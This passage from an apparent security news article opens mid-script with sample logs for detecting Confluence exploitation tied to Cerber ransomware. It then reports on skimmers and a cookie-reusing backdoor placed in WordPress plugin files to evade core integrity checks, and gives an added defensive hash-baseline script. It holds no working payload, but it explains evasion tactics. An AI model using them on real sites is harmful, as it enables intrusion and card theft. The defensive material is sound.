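    '203.0.113.7 - - [10/Nov/2021:08:21:05 +0000] "POST /pages/createpage-entervariables.action'
    '?SpaceKey=x HTTP/1.1" 200 3912 "-" "python-requests/2.26.0"',
    '198.51.100.23 - - [10/Nov/2021:08:22:10 +0000] "GET /pages/viewpage.action?pageId=65541'
    ' HTTP/1.1" 200 18822 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Nov/2021:08:22:30 +0000] "POST /rest/api/content HTTP/1.1"'
    ' 200 1200 "https://wiki.example.test/" "Mozilla/5.0"',
    "not an access log line",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"[{hit['confidence']:>4}] {hit['ip']} {hit['method']} "
              f"{hit['target']} -> {hit['status']}")
```

A low-confidence hit from an address that has no other Confluence activity, followed by an HTTP 200, is worth a closer look at the Confluence application log, where the expression itself is more likely to be recorded. Log review is a detective control only; the page's own advice to install the vendor updates is the fix.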

The Countries Targeted

The most recent attacks have primarily targeted the United States, Germany, and China. They have also hit Russia, which shows that the operators are not restricting themselves to any specific region.


Cybercriminals are always looking for exploitable flaws in popular enterprise software. The best defense against the recent Cerber attacks is therefore to install the security updates for Atlassian Confluence and GitLab.


Sucuri researchers have issued an alert about threat actors injecting credit card swipers into random plugins on e-commerce WordPress sites. Online scammers and threat actors ramp up their operations during the holiday season.

Sucuri researchers have discovered a concerning trend: threat actors are injecting e-skimmers into WordPress plugin files rather than the more closely monitored 'wp-admin' and 'wp-includes' core directories.

The researchers noticed changes to plugin and theme files while analyzing the logs of a compromised e-store.

"Attackers are aware that most WordPress security plugins include a mechanism for monitoring the file integrity of core files (that is, the files in wp-admin and wp-includes directories). Because of this, any malware injected into these files is very easy to detect, even by inexperienced website administrators. The following logical step would be for them to target plugin and theme files," Sucuri's analysis reads.

The security researchers found that, to maintain persistence, the attackers had injected a backdoor into the site's files. This means that even if the administrator installs the latest security updates for WordPress and the installed plugins, the attacker can still regain access to the e-store.

To gain access to the website, the backdoor obtains a list of administrator accounts and uses their authorization cookie and current user login.

The attackers then inject their malicious code into random plugins. Sucuri researchers noted that, unusually, many of the scripts did not use the encoding or obfuscation techniques that malware commonly relies on to evade detection.
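Sucuri's point is that integrity monitoring limited to wp-admin/ and wp-includes/ misses exactly this kind of injection. The script below is added here as an example and is not Sucuri's or WordPress's code: it builds a SHA-256 manifest of wp-content/plugins and wp-content/themes while the site is known to be clean, then diffs the live tree against that baseline so a modified plugin file or a dropped file is reported. The demo site layout, the '404-page' plugin directory and the injected content are constructed stand-ins.

```python
"""Extend file-integrity monitoring from WordPress core to plugins and themes.

Added example; not Sucuri's or WordPress's code.  A SHA-256 manifest of
wp-content/plugins and wp-content/themes is taken while the site is known
clean, and the live tree is later diffed against it, so an injection into an
arbitrary plugin file is reported even though wp-admin/ and wp-includes/ are
untouched.  The demo site layout below is constructed.
"""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List

WATCHED_DIRS = ("wp-content/plugins", "wp-content/themes")


def sha256_file(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(wp_root: Path) -> Dict[str, str]:
    """Relative POSIX path -> SHA-256 for every file under the watched dirs."""
    manifest: Dict[str, str] = {}
    for sub in WATCHED_DIRS:
        base = wp_root / sub
        if not base.is_dir():
            continue
        for path in sorted(base.rglob("*")):
            if path.is_file():
                manifest[path.relative_to(wp_root).as_posix()] = sha256_file(path)
    return manifest


def diff_manifest(baseline: Dict[str, str],
                  current: Dict[str, str]) -> Dict[str, List[str]]:
    """Files added, removed or changed since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def save_manifest(manifest: Dict[str, str], path: Path) -> None:
    # Keep this file OUTSIDE the web root; a backdoor that can write PHP
    # files can otherwise re-baseline itself.
    path.write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(path: Path) -> Dict[str, str]:
    return json.loads(path.read_text())


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a minimal site, simulate the injection
    described above (code appended to a plugin file plus a dropped file,
    core untouched), and report the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "htdocs"
        plugin = site / "wp-content" / "plugins" / "404-page"
        plugin.mkdir(parents=True)
        (plugin / "404-page.php").write_text("<?php\n// plugin code\n")
        theme = site / "wp-content" / "themes" / "storefront"
        theme.mkdir(parents=True)
        (theme / "functions.php").write_text("<?php\n// theme code\n")
        (site / "wp-includes").mkdir()
        (site / "wp-includes" / "version.php").write_text("<?php $wp_version = '5.8';\n")

        baseline_path = Path(tmp) / "baseline.json"   # outside the web root
        save_manifest(build_manifest(site), baseline_path)

        # Simulated compromise (constructed stand-ins, not real skimmer code):
        # content appended to an existing plugin file and a new file dropped
        # beside it, while core files stay untouched.
        with (plugin / "404-page.php").open("a") as fh:
            fh.write("// injected content stand-in\n")
        (plugin / "cache.php").write_text("<?php // dropped file stand-in\n")

        return diff_manifest(load_manifest(baseline_path), build_manifest(site))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Regenerate the baseline only after you have verified the files yourself (for example right after applying an update), and keep it where the web server user cannot write. Note that this check covers the injected files only: the backdoor described above reuses administrator authorization cookies, so cleanup should also include rotating administrator credentials and the WordPress salts, which invalidates the existing cookies.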

Code analysis revealed references to WooCommerce as well as numerous undefined variables. One of these undefined variables turned out to refer to a domain hosted on an Alibaba server in Germany, which is odd given that the infected e-store was operated by a North American company.

Another file on the same site revealed a second injection, in the '404 page' plugin, which contained the actual credit card skimmer and used the same approach of hidden variables in unobfuscated code. Using the same method as for the previous file, the experts found that the e-skimming was carried out through two variables, '$thelist' and '$message'.

"If you run an eCommerce website, be especially cautious during the holiday season. This is when we see the most attacks and compromises on eCommerce websites, as attackers are looking to profit handsomely from stolen credit card information," the report concludes. "Use the best security practices, harden your administrator dashboard, and ideally place your website behind a firewall service!"
